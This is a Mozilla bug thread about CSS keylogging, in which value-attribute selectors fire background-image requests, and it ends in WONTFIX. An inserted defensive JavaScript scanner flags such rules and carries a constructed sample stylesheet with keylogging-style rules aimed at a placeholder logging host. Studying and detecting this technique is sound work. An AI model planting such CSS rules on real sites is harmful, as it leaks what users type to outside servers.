Closed Bug 1440786 Opened 7 years ago Closed 5 years ago

Prevent CSS keylogging

Categories

(Core :: CSS Parsing and Computation, enhancement, P5)


RESOLVED WONTFIX

People

(Reporter: andre.jaenisch, Unassigned)


User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180203232545

Steps to reproduce:
Trying https://github.com/maxchehab/CSS-Keylogging makes me feel uncomfortable. Talking to the community I've learned about
- https://vimeo.com/100264064
- https://xss-game.appspot.com
- https://github.com/tlrobinson/evil.css/
so it is known, but I couldn't find a ticket here (too much noise on "background" search term).

Actual results:
Requests to an Express server are logged as people are entering data into an input.

Expected results:
In order not to break existing behaviour, I would expect to log a console.warn on the developer tools whenever there is a request using a CSS background-image on the value attribute of an input. If it turns out to not break apps, but is malicious only, it should be blocked altogether.
Severity: normal → enhancement
Component: Untriaged → Tracking Protection
Flagging the triage owner on this one in case there's already work going on to mitigate this.
Flags: needinfo?(francois)
Dan, any idea what component we should put bugs like that in? It doesn't have anything to do with the Disconnect-based tracking protection feature in Firefox.
Flags: needinfo?(francois) → needinfo?(dveditz)
This would require a spec-violating change to CSS. Note that CSS cannot actually respond to the content of an input -- this was seen as a potential security problem. What it can do is respond to the value _attribute_ which normally is static content served by the site. Unfortunately some JavaScript frameworks think it's a great idea to reflect the dynamic contents of an input back into the value attribute. This trick only works if a site uses one of these frameworks which are doing something that the CSS committee rejected as unsafe. What do you know: turns out it's unsafe. The readme of that extension says the first step is "Open a website that uses a controlled component framework such as React." Or in other words, if the site itself has installed a keylogger (React acts like a keylogger in order to reflect the content back into the value attribute) _then_ you can use CSS to detect that keylogging. I suspect this is WONTFIX. David?
Component: Tracking Protection → CSS Parsing and Computation
Flags: needinfo?(dveditz) → needinfo?(dbaron)
Product: Firefox → Core
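
The pattern discussed in this bug, a rule that selects on an input's value attribute and triggers a url() load, can be searched for when reviewing third-party stylesheets. The following is an added example, not code from this bug or from Firefox; the function names, the sample stylesheet and the example.invalid hosts are constructed for illustration.

```javascript
// Added example: flag rules that pair a selector on the `value` attribute
// with a url() load. All names and the sample CSS below are constructed.

// Blank out comments and string contents (keeping length) so braces or
// brackets inside quoted attribute values cannot confuse the rule splitter.
function mask(css) {
  const re = /\/\*[\s\S]*?\*\/|"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'/g;
  return css.replace(re, (t) =>
    t[0] === '/' ? ' '.repeat(t.length) : t[0] + '_'.repeat(t.length - 2) + t[0]);
}

function findValueLeakRules(css) {
  const masked = mask(css);
  const findings = [];
  const rule = /([^{};]+)\{([^{}]*)\}/g; // innermost blocks, so @media bodies are covered
  for (const m of masked.matchAll(rule)) {
    // An operator is required: a bare [value] test reveals nothing about content.
    const onValue = /\[\s*value\s*[~|^$*]?=/i.test(m[1]);
    const loads = /url\(/i.test(m[2]);
    if (!onValue || !loads) continue;
    // Indices are valid in the original text because masking preserves length.
    const bodyStart = m.index + m[1].length + 1;
    const body = css.slice(bodyStart, bodyStart + m[2].length);
    const urls = [...body.matchAll(/url\(\s*(['"]?)(.*?)\1\s*\)/gi)].map((u) => u[2]);
    findings.push({ selector: css.slice(m.index, m.index + m[1].length).trim(), urls });
  }
  return findings;
}

// Constructed sample stylesheet; example.invalid is a placeholder host.
const SAMPLE_CSS = `
/* constructed sample; not taken from any real site */
input { background: url("https://cdn.example.invalid/field.png"); }
input[type="password"][value$="a"] { background-image: url("https://log.example.invalid/a"); }
@media screen {
  input[value$='}'] { background-image: url(https://log.example.invalid/%7D) }
}
input[value] { border: 1px solid red; }
`;

for (const f of findValueLeakRules(SAMPLE_CSS)) {
  console.log(`${f.selector} -> ${f.urls.join(', ')}`);
}
```

A hit only means the stylesheet can observe the value attribute; as the comment above notes, that attribute tracks typed input only when the page reflects it there, so each finding still needs review.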
I guess wontfix is reasonable. That said, CSS features have been proposed that *would* allow selecting on the value of an input, and I don't recall them being rejected for security reasons. It's a thing that has legitimate use cases. I tend to think it's bad to assume that a malicious CSS author whose CSS is part of your site can't learn about the contents of your site.
Flags: needinfo?(dbaron)
:dveditz:, :dbaron: Okay, so it would violate a CSS spec … I've heard that W3C moved to GitHub. And indeed, I can see WG repositories there. However, I am feeling a bit lost about where to look in https://github.com/w3c/csswg-drafts. If you could lend me a hand here, I am asking the WG's members for their opinion on that. Won't Fix is a valid answer (albeit not making me too happy).
Flags: needinfo?(dveditz)
Flags: needinfo?(dbaron)
You're interested in the selectors spec; the latest draft for the relevant bits is
https://drafts.csswg.org/selectors-4/#attribute-representation
The current issues are
https://github.com/w3c/csswg-drafts/issues?utf8=%E2%9C%93&q=is%3Aissue+is%3Aopen+selectors+in%3Atitle
You could also raise this on their mailing list. I'm not involved in the group so I don't know whether a GitHub issue or mailing list discussion is better. I recommend skimming the recent mail archives to get the tenor of the group.
https://lists.w3.org/Archives/Public/www-style/
Flags: needinfo?(dveditz)
Further in the spec is https://drafts.csswg.org/selectors-4/#input-pseudos which is also relevant.
Third party CSS isn't safe. Browsers/specs shouldn't pretend it is by patching individual cases like this. I've outlined a few ways third party CSS can hurt you https://jakearchibald.com/2018/third-party-css-is-not-safe/.
P5 until something actionable comes out of the linked CSSWG issue.
Priority: -- → P5

The CSSWG just discussed this and agreed to close WONTFIX.

Status: UNCONFIRMED → RESOLVED
Closed: 5 years ago
Resolution: --- → WONTFIX